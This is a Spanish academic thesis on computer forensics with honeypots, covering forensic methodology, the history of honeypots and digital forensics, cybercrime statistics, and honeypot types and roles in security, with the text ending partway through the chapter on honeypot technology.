instituto politecnico nacional escuela superior de...
TRANSCRIPT
INSTITUTO POLITECNICO NACIONAL
Escuela Superior de Ingeniería Mecánica y Eléctrica
SECCIÓN DE ESTUDIOS DE POSGRADO E INVESTIGACIÓN
“Computo Forense mediante la Tecnología Honeypot”
Tesina presentada para obtener el grado de Especialista en Seguridad Informática y Tecnología de la
Información que
P R E S E N T A
Ing. Jonathan Christian Ángeles García
Director de Tesina: M en C Marcos Arturo Rosales García
Ciudad de México Junio 2010
Honey Forensic
Honey Forensic
Honey Forensic
Agradecimientos:
Gracias a mis padres José Luis y María
Por su cariño, comprensión y apoyo sin condiciones ni medida. Gracias por guiarme sobre el camino de la educación.
Gracias a mi hermana Edda
Por tus comentarios, sugerencias y opiniones.
Gracias a cada uno de los maestros
Que participaron en mi desarrollo profesional durante la especialidad, sin su ayuda y conocimientos no estaría en donde me encuentro ahora.
Gracias a mi asesor Marcos
Por permitirme ser parte de su equipo de trabajo. Tus consejos, paciencia y opiniones sirvieron para que me sienta satisfecho en mi participación dentro del proyecto de investigación.
Gracias a todos mis amigos
En especial a Nayeli, Edith y Héctor quienes han estado conmigo en las buenas y malas situaciones en las cuales compartimos tantas aventuras, experiencias, desveladas y triunfos.
Gracias a Peek, Falkon y Sombra
Por su amistad y cariño incondicional.
Honey Forensic
Tabla de Contenido
Capitulo 1: Introducción....................................................................................................................8 Investigación............................................................................................................................................................................................. 8 Problemática ............................................................................................................................................................................................. 8 Ciber Crimen y el Nacimiento de la Informática forense........................................................................................................ 9
Informática Forense.............................................................................................................................................................................11 Metodología Forense ............................................................................................................................................................................11 Propuesta de Metodología Forense................................................................................................................................................12
Propósito de la Investigación...........................................................................................................................................................13
Capítulo 2: Un Poco de Historia.......................................................................................................15 Antecedentes de la Tecnología Honeypot ..................................................................................................................................15 Antecedentes de la Informática Forense ....................................................................................................................................16 El principio de Locard (intercambio de indicios) ...................................................................................................................16 Delitos Informáticos ............................................................................................................................................................................17 The Internet Crime Complaint Center (IC3)...............................................................................................................................18
Capitulo 3: Tecnología HoneyPot ....................................................................................................22 Tecnología Honeypot ..........................................................................................................................................................................23 Definición de HoneyPot: ....................................................................................................................................................................23 Como funciona una Honeypot .........................................................................................................................................................24 Ventajas:....................................................................................................................................................................................................25 Desventajas: ............................................................................................................................................................................................26 Clasificación de Honeypots...............................................................................................................................................................26 Tipos de Honeypots .............................................................................................................................................................................27 El rol de un Honeypot en los Niveles de Seguridad Informática .....................................................................................27 Prevención ...............................................................................................................................................................................................28 El Engaño y Disuasión..........................................................................................................................................................................28 Detección ...................................................................................................................................................................................................29 Respuesta al Incidente .........................................................................................................................................................................30
Que es una HoneyNet? ........................................................................................................................................................................31 HoneyNet Virtual ...................................................................................................................................................................................31
Introducción a Nephentes .................................................................................................................................................................35
Capitulo 4: Convénio Unam CERT HoneyNet Project / IPN Esime Culhuacan (PSTM)........................36 Proyecto HoneyNet Unam México .................................................................................................................................................37 El Plan de Sensores de tráfico malicioso y malware..............................................................................................................37 Objetivos del Convenio .......................................................................................................................................................................37
Capitulo 5: Instalación de Sensores IPN Esime Culhuacan................................................................39 Requerimientos de Hardware .........................................................................................................................................................39 Requerimientos de Software. ..........................................................................................................................................................40 Instalación de Depentrap ..................................................................................................................................................................41 Selección del teclado............................................................................................................................................................................42 Configuración de red ...........................................................................................................................................................................43 Elección de los repositorios..............................................................................................................................................................46 Ingreso al sistema por primera vez...............................................................................................................................................48 Contraseñas .............................................................................................................................................................................................49 Nombre del equipo..............................................................................................................................................................................50
Honey Forensic
Capitulo 6: Análisis de un Ataque....................................................................................................51 Análisis Forense de un Honeypot ..................................................................................................................................................52 Elementos del Escenario:....................................................................................................................................................................52 ¿Como se realizo el ataque? ..............................................................................................................................................................52 Exploit .........................................................................................................................................................................................................53 Compilación del Backdoor .................................................................................................................................................................58 Comandos ejecutados...........................................................................................................................................................................58 Técnica antiforense .............................................................................................................................................................................59 The DDoS Project's "trinoo" ..............................................................................................................................................................60
Conclusión ......................................................................................................................................64
Citas y referencias Bibliográficas .....................................................................................................65
Glosario ..........................................................................................................................................67
Honey Forensic
Capítulo 1: Introducción
Honey Forensic
Capitulo 1: Introducción
Investigación La presente tesina es un documento de investigación sobre una de las tecnologías informáticas de Seguridad en redes e investigación más Innovadoras actualmente, hoy día los HoneyPots permiten obtener y analizar diferentes tipos de amenazas informáticas tales como troyanos y virus por mencionar algunos ejemplos. Con el uso de la tecnología las necesidades de comunicación continúan exigiendo nuevos objetivos, las técnicas de comunicación y procesamiento de datos están en constante evolución, esto origina nuevos retos también a la seguridad informática. Las nuevas amenazas representan un riesgo a la línea de negocios de las organizaciones desde que la información dejo de estar en papel para ser alojada en dispositivos de almacenamiento como usb, palm, dvd, celulares, computadoras etc. La Información corre un riesgo por el simple hecho de estar en un medio compartido como la red de Internet, nadie es dueño de los protocolos de Internet y cualquiera puede hacer mal uso de estos mismos ahora bien el computo forense también debe evolucionar constantemente y estar al día en cuanto a nuevas amenazas y avances tecnológicos. Esto implica un retó para el computo forense se requiere un medio, el cual permita mantener un proceso innovación que permita enfrentar y dar solución a estos nuevos retos, cabe desatacar que no siempre los casos a los cuales se enfrenta el investigador forense son los mismos y realizar una Investigación se complica cuando no se tiene el suficiente conocimiento para poder manejar y concluir el caso.
Problemática Hoy día existe una dependencia importante hacia los sistemas informáticos y la tecnología donde la información toma un valor muy importante en la unidad de Negocio de las Organizaciones, las amenazas informáticas como los: Virus, Worms, DoS, Phishing, Spam, Spim, Spit, DNS Cache poisoning, Botnets, etc. Muestran las deficiencias que los sistemas Informáticos poseen, en base a esto existe una constante defensa en contra de ataques informáticos. La capacidad de aprender de este tipo de sucesos es reducida y a veces inexistente, existe también la Implementación de Arquitecturas de Seguridad como IDS, Firewalls, VPNs, Proxies, Filtros Anti-Spam, Cifrado, etc. “Todo esto en defensa de la información” por lo que siempre se busca tener cinco características principales en la información las cuales son:
• Autenticidad
• Confidencialidad
• Integridad
• Disponibilidad
• No repudio.
Honey Forensic
La búsqueda de evidencias se hacen aun más complicadas en un delito informático las técnicas anti-forenses que la comunidad Black Hat utiliza en los ataques son mas Ingeniosas cada día, esto hace que la necesidad de obtener el conocimiento sobre estos temas sea importante.
Al existir pocas investigaciones sobre técnicas que permitan mejorar e innovar métodos, técnicas y herramientas forenses, sobre estas nuevas amenazas que enfrenta la información. La tecnología Honeypot se integra como el medio que permita solucionar estas interrogantes.
Ciber Crimen y el Nacimiento de la Informática forense En los últimos 30 años han habido un crecimiento exponencial en las telecomunicaciones hoy en día existen redes de datos que nos permiten transferir y procesar información de una localidad virtual a otra en casi todo el planeta tierra incluso fuera del mismo en tiempo real.
¿Que es lo que la evolución tecnológica ha traído consigo a la sociedad?
Un abanico de oportunidades para la actividad criminal. ¿Quienes son estas personas? Un grupo organizado de criminales ¿Cual es su objetivo primordial? Actividades Financieras Pornografía Infantil, traficó de drogas, fraudes etc. Han encontrado otra manera realizar un trabajo sucio con los recursos financieros ajenos entre otras cosas.
Personas involucradas en actividades de espionaje empresarial también hacen uso de los sistemas de telecomunicación ellos constantemente irrumpen en redes de datos gubernamentales, comerciales y militares robando modificando y traficando con información como datos secretos, nuevos diseños, nuevas formulas, estados financieros etc. Incluso la información que se guardan en las computadoras personales no está a salvo de este riesgo.
No podemos tener los sistemas de comunicación completamente seguros, lo que sucede es que los bancos, casas y negocios siempre han tenido fallas de seguridad, aun existen robos a casas, negocios y bancos no podemos tener la certeza de que la información este a salvo casi nada en el mundo físico esta realmente seguro.
Por lo tanto no podemos esperar que en el mundo digital sea diferente, como en el mundo físico estamos en constante alertas de ataques en contra de bancos casas y negocios. Ya que hoy día una persona puede entrar a una casa, negocio, bases militares y organizaciones gubernamentales sin ni siquiera pisar el área recepción del edificio es decir sin estar físicamente en el lugar, ellos pueden entrar sin autorización como un claro ejemplo el incidente registrado el día 6 de junio del 2010 al sitio del Aeropuerto de la Ciudad de México el cual fue bloqueado, modificado y donde se inserto el fondo de la música de Mario Bros a ritmo tropical.
Honey Forensic
El hacker denominado como “etizx” con un mensaje reclama a las autoridades de su incompetencia laboral y detalló que “en todo salimos perjudicados y ¿ustedes? sólo se lavan las manos”.
“Etizx” criticó también al programa de Registro Nacional de Usuarios de Telefonía Móvil (RENAUT).
Figura 0.0 Portada del sitio del Aeropuerto de la Ciudad de México al ser comprometida (Defacement).
Honey Forensic
Informática Forense La informática forense ó Computo forense surge en los años ochentas básicamente en el año de 1984 con un laboratorio del FBI y otras agencias especializadas en crímenes, comienzan a realizar programas de investigación sobre la evidencia digital grupos de investigación como el Computer Analysis and Response Team (CART), the Scientific Working Group on Digital Evidence (SWGDE), the Technical Working Group on Digital Evidence (TWGDE), y el National Institute of Justice (NIJ) de los Estados Unidos de Norteamérica comienza a unir fuerzas en la investigación sobre el computo forense como una nueva disciplina y ciencia incluyendo la necesidad de estandarizar métodos y técnicas en una investigación.
Metodología Forense Como una nueva ciencia y disciplina se deriva una metodología que permita seguir una serie de pasos y procesos para obtención de resultados hoy día existen varias metodologías señaladas por varios organismos Internacionales como el EC-COUNCIL, NIST y el SANS INSTITUTE por nombrar algunos ejemplos, algunas de estas metodologías varían en su contenido y pasos que estos indican, pero siempre existe un inicio y un fin común entre todas ellas. Algunos elementos que integran una metodología de cómputo forense son la preservación, recolección, validación, identificación, análisis, interpretación y presentación de la evidencia [5].
Por ejemplo La Metodología de Computo forense que implementa el Departamento de Justicia de los Estados Unidos de Norteamérica en una escena de crimen informático tiene las siguientes fases:
1. Colección: esta fase envuelve la búsqueda de evidencia, Identificación de evidencia, recolección de evidencia y Documentación de evidencia.
2. Examinación: esta fase esta diseñada para hacer visible la evidencia, mientras se explica el origen y el significado de esta misma. Esto envuelve revelar información escondida, delicada y Obscura.
3. Análisis: Esta fase es el producto de las dos fases anteriores destacando la fase de examinación dando un valor significativo a la evidencia con respecto al caso que se esta investigando.
4. Reporte: Esta fase se detalla de forma minuciosa todos los procedimientos realizados y los resultados obtenidos en un reporte.
Honey Forensic
Siendo honestos y analistas podemos agrupar varios pasos en una fase teniendo en cuenta que debe de existir un inicio y un fin común de las fases que integran la metodología como son la identificación y el reporte de los resultados.
Propuesta de Metodología Forense La siguiente es una propuesta de metodología que consta de tres principales categorías que son: la respuesta a incidentes, Investigación y por ultimo el Reporte en donde de cada una se derivan subcategorías.
Respuesta al Incidente:
1. Identificación
2. Verificación
3. Adquisición y recolección de evidencia
Investigación:
4. Análisis de medios
5. Análisis de línea de tiempo
6. Búsquedas por Byte o String
7. Evidenciar y Recuperar datos
Reporte final
8. Reportar Resultados
Descripción de fases.
Identificación: Fase en donde se descubre y reconoce la evidencia.
Verificación: Fase en la que se comprueba y verifica la integridad la evidencia.
Adquisición y recolección: Fase en la que se obtiene y acumula la evidencia.
Análisis de medios: Fase en donde se sacan fotos de la evidencia se aplican cuestionarios para obtener información del entorno físico o lógico que conforma la evidencia y sobre el tipo de caso al que se enfrenta el analista forense.
Honey Forensic
Análisis de línea de tiempo: Fase en donde se busca establecer una línea de sucesos sobre la evidencia y permita obtener un Cronograma del Caso.
Búsquedas por Byte y string: Fase de exploración por string (palabras clave) y bytes (BIT a BIT) en los dispositivos.
Evidenciar y Recuperar datos: Fase en la que se busca destacar la evidencia y recuperar. Datos borrados u ocultos en los medios o dispositivos, mientras se identifica cuando fueron borrados los datos.
Reporte de resultados: Fase en la que se realizan dos tipos de reportes el ejecutivo y el técnico basados en el análisis, describiendo de forma detallada toda la investigación del caso y al mismo tiempo reportando hallazgos y dando conclusiones
Propósito de la Investigación El propósito de la investigación tiene como fundamental objetivo el dar otro enfoque al uso de la tecnología Honeypot desde el punto de vista Forense, obteniendo así el conocimiento que nos permita innovar la Informática forense.
Honey Forensic
Capítulo 2: Un Poco de Historia
Honey Forensic
Capítulo 2: Un Poco de Historia
Antecedentes de la Tecnología Honeypot El concepto tiene ya más de 10 años de historia, aunque la tecnología aplicada de manera formal tiene menos y poca documentación de sus orígenes.
• 1990/1991 - La primera publicación referente al concepto CLIFFORD STOLLS THE CUCKOOS EGG AND BILL CHESWICKS
• 1997 - Versión 0.1 de FRED COHEN OF DECEPTION TOOLKIT fue lanzada como una de las primeras soluciónes Honeypot en la comunidad de seguridad.
• 1998 - El desarrollo comenzó con CYBERCOP STING uno de las primeros Honeypots Comerciales que fueron vendidos al Publico CyberCop Sting introduce el concepto de múltiples sistemas virtuales concentrados en un solo Honeypot.
• Marty Roesch y GTE InternetWorking Comenzó el desarrollo de una solución Honeypot que eventualmente se convirtió en NETFACADE este trabajo también fue el que originó el concepto de SNORT.
• 1999 - Se formo el proyecto HONEYNET PROJECT y de una serie de Importantes Publicaciones “KNOW YOUR ENEMY” este proyecto y publicaciones fueron las que hicieron crecer el valor de la tecnología Honeypot. Este proyecto se inició informalmente en la lista de correo “Wargames” en abril de 1999 gracias a los correos cruzados entre varios expertos en seguridad de redes que culminaron con el desarrollo formal del proyecto antes de finalizar el año.
• 2000 - En junio de 2000 y por espacio de tres semanas, el Honeypot del proyecto fue atacado y comprometido por un famoso grupo de hackers, lo que permitió el estudio del comportamiento de este grupo, así como demostrar la viabilidad y utilidad de esta nueva herramienta de seguridad.
Este conocido incidente elevo inmediatamente el concepto de Honeypot como la última tendencia en seguridad de redes convirtiendo su libro en un best-seller de lectura obligatoria para todos los profesionales de la seguridad.
• A inicios de 2001 se convirtió en una organización sin ánimo de lucro dedicada al estudio de los hackers (blackhats) que actualmente está compuesta por más de 30 miembros permanentes.
• 2000/2001 - El uso de Honeypots para la captura de información con el objetivo de estudiar la actividad de gusanos Informáticos. Muchas Organizaciones adoptaron los Honeypots como el medio de investigación y detección de ataques informáticos.
• 2002 – Honeypots son usados para detectar y capturar información en sobre ataques desconocidos, Específicamente en Solaris el exploit dtspcd.
Honey Forensic
Antecedentes de la Informática Forense La Historia del Computo Forense [4].
• 1822-1911 – Francis Galton realizo el primer estudio sobre huellas digitales para
atrapar criminales potenciales.
• 1887-1954 – Leone Lattes fue la primera persona en usar la sangre para vincular a un criminal a un delito.
• 1891- 1955 – Calvin Goddar se convirtió en la primera persona en usar armas de fuego y balas para poder completar casos truncos de crimines sin resolver por la corte.
• 1858- 1946 – Albert Osborn se convirtió en la primera persona en desarrollar las características principales de la documentación de evidencia dentro de un procesos de examinación.
• 1847- 1915 – Hans Gross fue la primera persona en realizar y dirigir una investigación científica sobre un crimen.
• 1932 – El departamento de Investigación Federal establece un laboratorio forense para proveer de servicios forenses a agentes y otras autoridades del gobierno.
El principio de Locard (intercambio de indicios) El principio de intercambio de Indicios o principio de Locard fue creado “Edmond Locard” plantea que los indicios o evidencias físicas proceden principalmente de las siguientes fuentes:
• Del sitio o lugar de los hechos.
• Del presunto responsable o autor.
• De la víctima u ofendido.
Cuando se produce la comisión de un hecho delictivo en un porcentaje muy alto, se produce un intercambio de indicios o evidencias entre la víctima y el autor del hecho. Debe recordarse que no hay delincuente que a su paso por el lugar de los hechos no deje tras de sí alguna huella aprovechable, y cuando no se recogen evidencias útiles en la investigación, la verdad es que no se ha sabido buscarlas en virtud de casi siempre se manifiesta un intercambio de indicios entre el autor, la víctima y el lugar de los hechos .
Para efectos de ilustrar éste principio a continuación se expone un ejemplo de un caso real sucedido en una colonia de la periferia del Distrito Federal México: Se localizó el cadáver de
Honey Forensic
una mujer e 20 años de edad, completamente masacrado con una piedra grande sobre la cara y el cráneo, tirado sobre un arroyo de lodo y tierra; de sus manos se recogieron cabellos, que tenía adheridos con sangre seca y se le apreciaron tres uñas rotas en la mano derecha; cercano al cadáver y sobre el piso de lodo se apreciaron un llavero y una huella de pie calzado muy tenue. Después de laboriosas investigaciones, se capturó al responsable del hecho; se le apreciaron rasguños recientes en las regiones dorsales de las manos y en los antebrazos. Además, en el cuarto que habitaba, cercano al lugar de los hechos, se localizó bajo la cama un par de calzado de color negro, de hombre, con vestigios de lodo entre el tacón y la suela y se comprobó que el llavero visto y recogido cercano al cadáver pertenecía al detenido sujeto a investigación. [6]
Las investigaciones concluyeron con éxito. Ahora se analizará la evidencia como se pudo constatar en el "intercambio de indicios":
1) El autor del hecho dejó sus cabellos en las manos de la víctima, su llavero sobre el piso de lodo y una huella de pies calzado sobre el piso de lodo en el lugar de los hechos.
2) La víctima imprimió sus huellas con las uñas sobre las regiones dorsales de las manos y antebrazos del víctimario (rasguños).
3) Del lugar de los hechos, el víctimario se llevó lodo entre el tacón y la suela de su calzado. Por tanto se pudo establecer ciertamente el principio de intercambio de indicios entre víctima, víctimario y el lugar de los hechos.
Esto representado en el mundo digital se puede expresar como: Conexiones ssh ,claves publicas entre un cliente y servidor, logs, cookies guardadas en el explorador, exploits compilados etc.
Delitos Informáticos Según las naciones unidas los delitos informáticos son los siguientes:
• Fraudes cometidos mediante manipulación de ordenadores.
• Manipulación de programas.
• Manipulación de datos de salida.
• Fraude efectuado por manipulación informática o por medio de dispositivos informáticos.
• Falsificaciones informáticas.
• Sabotaje informático.
Honey Forensic
• Virus, gusanos y bombas lógicas.
• Acceso no autorizado a Sistemas o Servicios de Información.
• Reproducción no autorizada de programas informáticos de protección legal.
• Producción / Distribución de pornografía infantil usando medios telemáticos.
• Amenazas mediante correo electrónico.
• Juego fraudulento on-line.
Ahora bien existen organizaciones que se dieron a la tarea de crear un centro de respuesta a quejas de crimines en Internet y que también dan una clasificación a los mismo.
The Internet Crime Complaint Center (IC3) La IC3 entro en funcionamiento el 8 de mayo del 2000 como un centro que Quejas y fraudes en conjunto con el National White Collar Crime Center (NW3C) y el Federal Bureau of Investigation (FBI) el IC3 sirve como el medio para recibir quejas sobre el ciber crimen y otorga un medio fácil en el cual las víctimas pueden dar información sobre los delitos que suceden en Internet, desde que entro en funcionamiento esta organización a recibido distintos tipos de quejas que hoy día clasifica mediante un cuestionario dentro del proceso de recepción de quejas. Han sido variados los temas que recibe esta institución que van desde derechos de Propiedad de Autor (IPR), Intrusión a Sistemas de Computadoras (hacking), espionaje Electrónico pornografía infantil, lavado de dinero Internacional, robo de identidad, y una lista enorme de clasificación de delitos que van creciendo año con año. IC3 2009 Internet Crime Report 2009 es la novena compilación de información sobre las quejas que recibe IC3 y que fueron hechas desde la www.ic3.gov esta información proviene de Estados Unidos de Norte América ya que en México no existe una organización que tenga este tipo de actividades, también hay que mencionar que esta información esta basada en la información recabada mediante el cuestionario que la IC3 creo para la recopilación de quejas sobre los crímenes en Internet [12].
Los resultados proveen y examinan las características claves las cuales son:
• Quejas.
• Perpetradores.
• Víctimas.
• Interacción entre los criminales y las víctimas.
• Virus y gusanos Populares.
Honey Forensic
Figura A Comparación Anual de quejas recibidas en Internet desde el portal de IC3 hasta el 2009.
Figura B Perdidas Anual en millones de Dólares hasta el 2009.
Honey Forensic
Figura C Números Anuales Referidos.
Figura D El Top 10 de las Quejas mas Comunes por Categoría recibidas en el 2009.
Honey Forensic
Figura E Porcentaje en Perdidas Monetarias .
Figura E Los 10 Países con mas quejas reportadas al IC3 en donde México se encuentra en la octava posición.
Honey Forensic
Capítulo 3: Tecnología HoneyPot
Honey Forensic
Capitulo 3: Tecnología HoneyPot
Tecnología Honeypot Algunas de los mal entendidos por los cuales los Honeypots no son aun adoptados por la comunidad de seguridad es simplemente su definición. Ya que algunos la definen como otra herramienta más de detección de intrusiones, otros sin embargo como una cárcel donde se aísla al atacante, como un ambiente de producción controlado, como sistema que emula vulnerabilidades, estos son algunos de las definiciones que le han dado a esta tecnología [1].
Definición de HoneyPot:
Honeypot es un recurso flexible de Seguridad Informática cuyo valor se basa en que este sea comprometido, atacado y probado con el fin de aportar información al
investigador forense. Tomando en cuenta esta definición un Honeypot no es una tecnología que mitigue el riesgo de un ataque. Ahora bien lo que se designe como Honeypot no tiene mucha importancia siempre y cuando cumpla con el criterio antes descrito, no importando que recurso sea (Router, Switch, un script, un Servidor productivo etc.) si esta carece de este criterio no servirá. Así que en base a esto la tecnología Honeypot es diferente a otras herramientas de seguridad las cuales toman otro tipo de manifestaciones, Muchas soluciones de seguridad son diseñadas específicamente para resolver un problema en específico. Por ejemplo los firewalls son utilizados para controlar el tráfico que fluye dentro de una zona de red a otra como un dispositivo de control de acceso. Un Sistema de detección de intrusos es usado para detectar ataques monitoreando los sistemas operativos y la actividad de red, detectando acceso no autorizados. Los Honeypots son diferentes en cuanto a que no están restringidos a resolver un problema en especifico, son una herramienta flexible que puede ser usada en varios escenarios y de diferentes maneras por eso es que algunas veces es vaga su definición y los administradores llegan a confundir esta tecnología por ejemplo un Honeypot puede ser usada para controlar el flujo de traficó de una red, meta que comparte con un firewall perimetral o detectar un ataque como un IDS.
Los Honeypots son capaces de capturar y analizar ataques automatizados como los de un gusano informático también tienen la capacidad de ser una herramienta de investigación sobre las comunidades Black-Hat obteniendo un registro de sus actividades y comunicaciones mientras sucede el ataque.
Como se use una Honeypot y a donde se pretende llegar con el depende del administrador sin embargo todas las manifestaciones comparten una característica en común “Su valor se basa en que este sea comprometido, atacado y probado con el fin de aportar información al investigador forense. Es aquí donde la Informática Forense hace uso de ella para obtener información valiosa que pueda ser usada ya sea como evidencia ante un delito informático y
Honey Forensic
aún mas innovando las técnicas forenses, desarrollo de herramientas forenses, procedimientos y metodologías.
Como funciona una Honeypot Para entender mejor como funciona un Honeypot se dará un ejemplo ya que este cuenta con distintos tipos de funcionamientos. Como ejemplo se designa un Servidor Windows 2003 con Microsoft Exchange brindando el servicio de Correo electrónico desde hace ya tiempo, el gerente de Infraestructura de la organización decide que es tiempo de actualizar la infraestructura y servicios. Así que después de la migración El administrador de la red decide poner el Servidor Windows 2003 dentro de la DMZ (Red Desmilitarizada) capturando, vigilando y analizando el traficó que fluye en esa zona de red para determinar si existen o no accesos no autorizados dentro de la DMZ, la intención del administrador es utilizar el viejo servidor como un Honeypot.
Si este servidor de correo el cual, se espera que no tenga de nuevo tráfico y procesos de producción volviera a tener tráfico de este tipo querrá decir que este fue atacado o de alguna manera comprometida y por definición entra como un Honeypot.
Figura 1.0 Implementación de una Honeypot en la red Desmilitarizada (Dmz) para detectar ataque.
Honey Forensic
Otro ejemplo sería el siguiente la organización determina que los gusanos, virus y otro tipo de amenazas informáticas son catalogados como de extremo riesgo para la continuidad de negocio especialmente si logran romper la seguridad perimetral como los firewall é infiltrarse en la red interna, se decide diseñar y desarrollar un sistema que funcione como Honeypot, una solución que no solo notifique de los accesos no autorizados si no que disminuya de alguna manera riesgo ó en su defecto que pare la intrusión.
Ventajas: Valor de los datos: día a día se genera información relativa a la actividad de la red, ya sea desde el IDS, Firewall y/o las bitácoras del sistema, que son grandes cantidades de datos que hay que analizar para detectar alguna anomalía en la red. Esto no sucede en los Honeypots, debido a que no son sistemas en producción, toda actividad dirigida hacia los Honeypots es sospechosa por naturaleza.
Sin embargo aunque esta cantidad de datos es pequeña representa un gran valor debido a que toda la actividad capturada puede ser un escaneo, una prueba o un ataque. Esto reduce los tiempos de detección y de análisis de la actividad maliciosa en la red.
Simplicidad: La simplicidad de la implementación es decir es tan sencilla como conectarlo a la red y listo, aún cuando los Honeypots de investigación son más complejos en su implementación el funcionamiento es relativamente el mismo.
Uso de Recursos: La tecnología ya en funcionamiento no necesita grandes cantidades de recursos de procesamiento y memoria, no es cara su implementación en cuanto a la adquisición de recursos se puede utilizar Hardware reciclado.
Flexibilidad de Uso: El Objetivo que se le otorgue a la implementación de un Honeypot es flexible ya que no esta atada a resolver un problema en especifico.
Regreso de la Inversión: Mientras los firewalls mantienen afuera a los Intrusos dentro de una organización, estos se convierten en víctimas de su propio éxito ya que posterior a algunos años el departamento de Finanzas se pregunta por el regreso de la Inversión es decir realizan algunas preguntas como: ¿Invertimos dinero en la Implementación de un Firewall tres años atrás y nunca hemos sido atacados? ¿Para que necesitamos un Firewall si no hemos sido atacados? La razón es porque el Firewall ayuda a mantener segura la red de Forma Perimetral ayudando reducir el riesgo, ahora bien este mismo problema lo enfrentan otras tecnologías de Seguridad como IDS, Sistemas de identidad IDM, Sistemas de Autenticación y cifrado.
La implementación de Arquitecturas o Sistemas de seguridad generan un gasto en cuanto a tiempo, dinero y recursos para las organizaciones. En contraste los Honeypots rápidamente descubren su valor por que cuando sucede un ataque se sabe que las amenazas están afuera, capturando la actividad no autorizada, los honeypots son usados para justificar no solo su valor si no el de otro tipo de tecnologías de seguridad.
Honey Forensic
Desventajas: A pesar de las grandes ventajas de esta tecnología también se tienen desventajas en su Implementación.
Huella Digital (FingerPrint): Este concepto se refiere a que una Honeypot ò HoneyNet pueden ser detectadas por el intruso incluso justo antes de entrar en ella, por lo cual no serviría de nada, su valor se perdería e incluso la información que se obtuviera podría ser manipulada por el intruso obteniendo datos erróneos.
Riesgo: Este riesgo consiste en que un intruso puede hacer mal uso de los recursos de un Honeypot usándolo como arma en contra de otros equipos y lograr infiltrarse dentro de la red.
Alcance Limitado: Un Honeypot solo nos puede brindar información sobre lo que esta a su alcance es decir no podemos extraer información de otro equipo o segmento de red.
Clasificación de Honeypots Su clasificación se basa en el nivel de libertad que tiene el intruso al estar en contacto con el Honeypot, consiste en la interacción que exista entre estos dos, mientras mas tiempo de interacción exista mayor cantidad de información podemos analizar del Ataque.
Baja Interacción: El nivel de libertad que existe es muy poca este HoneyPot es usualmente usada para detectar pruebas de escaneo y analizar traficó malicioso. Son servicios emulados como por ejemplo un servicio de Ftp.
Media interacción: El nivel de interacción aumenta en este Honeypot el intruso logra observar mayores funcionalidades en cuanto a el servicio que trata de vulnerar usando una consola de línea de comandos u otro tipo de características.
Alta interacción: El nivel de interacción que existe es total es decir el Honeypot cuenta con Servicios reales, Sistemas Operativos Reales en los cuales el intruso puede interactuar el riesgo en este tipo de soluciones aumenta ya que el intruso puede hacer uso del Honeypot como un arma en contra de otros dispositivos.
Honey Forensic
Tipos de Honeypots
Esta Tecnología se divide en dos tipos aunque con respecto a su funcionamiento es similar en ambos casos.
Producción: Son utilizados para proteger una organización mediante la detección de ataques, agregando un valor significativo a la infraestructura de seguridad y ayudando a mitigar riesgos, aquí la cantidad de información que podemos obtener a partir de ellos es reducida limitándose a la necesidades de la organización.
Investigación: Los Honeypots de investigación tienen como objetivo, recolectar información sobre la actividad maliciosa en la red, con la cual se podrá obtener conocimientos sobre las amenazas que las organizaciones enfrentar; Como es que trabajan los intrusos, que tipo de herramientas utilizan y como es que obtienen esas herramientas, así como los motivos que los orillan a realizar el ataque.
El rol de un Honeypot en los Niveles de Seguridad Informática Dentro de un esquema de seguridad Informática existen tres funciones importantes, que una organización debe implementar en su red corporativa esto con el fin de diagnosticar fallos de seguridad antes que los hackers lo hagan, esto consiste en los siguientes puntos:
• Análisis de Vulnerabilidades.
• Análisis de Riesgo.
• Detección de Intrusos.
• Respuesta al Incidente.
• Computo Forense.
Ahora bien ya que se describieron las ventajas y desventajas de los Honeypots junto con sus tipos y características, describiré Como los Honeypots otorgan un valor agregado a la seguridad y Cómo reducen el riesgo de un ataque. Se describirá un modelo en particular de seguridad informática aunque existen otros modelos aun más complejos este modelo en particular es conciso, concreto y sin rebuscar terminologías y tecnicismos, la seguridad informática se divide en tres categorías que se definen en Intrusión, Prevención y Respuesta al Incidente [1].
Honey Forensic
Prevención El primer nivel de seguridad es la prevención que es alejar la amenaza mantener a los intrusos fuera, en el mundo físico la prevención sería algo similar a colocar una barda de 6 metros de altura con una reja electrificada, candados en las puertas y perros de guardia todo esto para mantener la seguridad y la amenaza fuera.
El departamento de seguridad de las empresas u organizaciones implementan arquitecturas de seguridad perimetral como un firewall para controlar el tráfico que pasa a través de una red a otra ó sistemas de autenticación como contraseñas robustas y certificados digitales mecanismos de Cifrado que previenen que los atacantes puedan saber el contenido de un correo electrónico o poder saber contraseñas. El papel de un honeypot dentro de esta categoría es agregar un valor aunque poco pero significativo ya que recordaremos que los honeypots no están diseñados para cumplir un solo propósito y tampoco detienen un ataque, si honeypot es incorrectamente implementado puede introducir un riesgo a la infraestructura de red de la organización, ahora bien lo que si puede detener un ataque son las mejores prácticas implementadas tales como parchar sistemas operativos, usar contraseñas robustas implementar controles de seguridad lógicos, controles de accesos etc.
El Engaño y Disuasión Estos dos factores son dos armas que un honeypot puede integrar a un esquema de seguridad otorgando un valor agregado y endureciendo la seguridad, aunque son armas psicológicas esto es de gran ayuda, ya que por ejemplo si un hacker sabe de la existencia de una zona honeypot en la topología de red de su posible víctima tal vez querrá mejor atacar otros sistemas y no perder su tiempo y recursos en el. Ahora bien cuando un intruso es engañado por medio de un Honeypot y este comienza a atacarlo, esta acción dará tiempo al administrador a darse cuenta que se esta realizando un acceso no autorizado tomando medidas para responder ante el incidente, esto no quiere decir que se esta mitigando el ataque pero si nos dará otro tipo de defensa en contra de los intrusos. Cabe destacar que esto solo funciona cuando existe la intervención Humana ya que el engaño y la disuasión solo funcionan cuando el ataque es perpetrado por un Hacker o Hackers más no cuando se utilizan Herramientas automatizadas o el ataque es generado por un gusano informático. Pero que hay con los scripts, programas y utilerías que escriben los Hackers para poder realizar sus ataques, estas mismas herramientas se pueden descargar desde sitios underground en la Internet. Una persona con poco conocimiento técnico podría hacer uso de estas herramientas e incluso Atacar una red completa solamente escribiendo el rango de ip’s y siguiendo el asistente de ejecución de la herramienta y así completar el ataque. Existen dos formas que un atacante usa al iniciar un ataque que son la Elección y la Oportunidad, respectivamente el primero es aquel en el cual se ha seleccionado una víctima
Honey Forensic
esto sucede cuando por ejemplo el atacante ya ha hecho un escaneo de red, y ha identificado un host vulnerable y selecciona una víctima de entre varias posibles, ahora bien el segundo sucede cuando el objetivo es atacar cuantos mas host sean posibles dentro de una red por ejemplo cuando se realiza el ataque con una herramienta automatizada o el ataque es perpetrado por un gusano informático que trata de distribuirse así mismo a tantas maquinas como sea posible.
